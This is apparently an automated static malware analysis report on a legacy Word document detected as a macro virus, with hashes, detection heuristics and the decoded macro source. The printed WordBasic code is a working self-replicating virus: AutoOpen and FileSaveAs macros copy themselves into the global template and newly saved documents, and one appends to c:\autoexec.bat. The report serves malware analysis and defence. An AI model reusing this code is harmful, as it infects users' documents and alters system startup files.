Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4a33bf626d5f505…

MALICIOUS

Office (OLE)

Size: 46.0 KB
Created: 1993-09-28 22:08:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 71cd05563ba9443751f1e8d6d6cc9b18
SHA-1: 298fd316c650754017c1ba32942a7fbfce2bfb16
SHA-256: e4a33bf626d5f505ea4b5907c4c0da51e782ece2a73f0327f5e6e05ee3bfe46e
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macros, including an AutoOpen macro designed to execute automatically upon opening. The FileSaveAs macro is intended to copy itself and other macros to newly saved documents, indicating a self-replicating macro virus. The ClamAV detection further confirms its malicious nature.

Heuristics (4)

  • ClamAV: Doc.Trojan.Sig-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Sig-2
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7304 bytes
SHA-256: 24ea8cf0f514542a813bfc8bc681cfbf50a165f3e638b340a489c0b1aee530c6
Detection: ClamAV: Doc.Trojan.Sig-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSaveAs"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Copies the virus from NORMAL.DOT onto every document saved using SaveAs."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim CurrentFile$
Dim CopyParameter$
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
CurrentFile$ = WordBasic.[FileName$]()
CopyParameter$ = CurrentFile$ + ":FileSaveAs"
WordBasic.MacroCopy "Global:FileSaveAs", CopyParameter$
CopyParameter$ = CurrentFile$ + ":Signature"
WordBasic.MacroCopy "Global:Signature", CopyParameter$
CopyParameter$ = CurrentFile$ + ":AutoOpen"
WordBasic.MacroCopy "Global:AutoOpen", CopyParameter$
WordBasic.FileSaveAs dlg    'This line is part of the Word default
End Sub

Attribute VB_Name = "Signature"

Public Sub MAIN()
Attribute MAIN.VB_Description = "The virus signature file.\r\n"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Signature.MAIN"

    Rem Chris' Word macro virus signature file.

End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Automatically executes when the file is opened and installs the macro virus."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim Title$
Dim TotalMacros
Dim CurrentMacro
Dim AlreadyInstalled
Dim Install
Dim CurrentFile$
Dim CopyParameter$
Dim name_$

On Error GoTo -1: On Error GoTo Finish
Title$ = "HELL for Windows"
TotalMacros = WordBasic.CountMacros(0)
For CurrentMacro = 1 To TotalMacros
    If WordBasic.[MacroName$](CurrentMacro) = "Signature" Then
        AlreadyInstalled = -1
    End If
Next CurrentMacro
If AlreadyInstalled Then
End If
If Not AlreadyInstalled Then
Install = 1
If Install Then
    CurrentFile$ = WordBasic.[FileName$]()  'Put current filename into Currentfile$
    CopyParameter$ = CurrentFile$ + ":AutoOpen" 'Make #1 arg for MacroCp
    WordBasic.MacroCopy CopyParameter$, "Global:AutoOpen"   'in MacroCopy command
    CopyParameter$ = CurrentFile$ + ":Signature"
    WordBasic.MacroCopy CopyParameter$, "Global:Signature"
    CopyParameter$ = CurrentFile$ + ":FileSaveAs"
    WordBasic.MacroCopy CopyParameter$, "Global:FileSaveAs"
End If
End If
name_$ = "c:\autoexec.bat"
Open name_$ For Append As 1
Print #1, "WIN"
Close 1
Finish:

End Sub

' Processing file: /opt/analyzer/scan_staging/ec23f07b4a6a4afeb45b9d2f1ef34d10.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/FileSaveAs - 2166 bytes
... (truncated)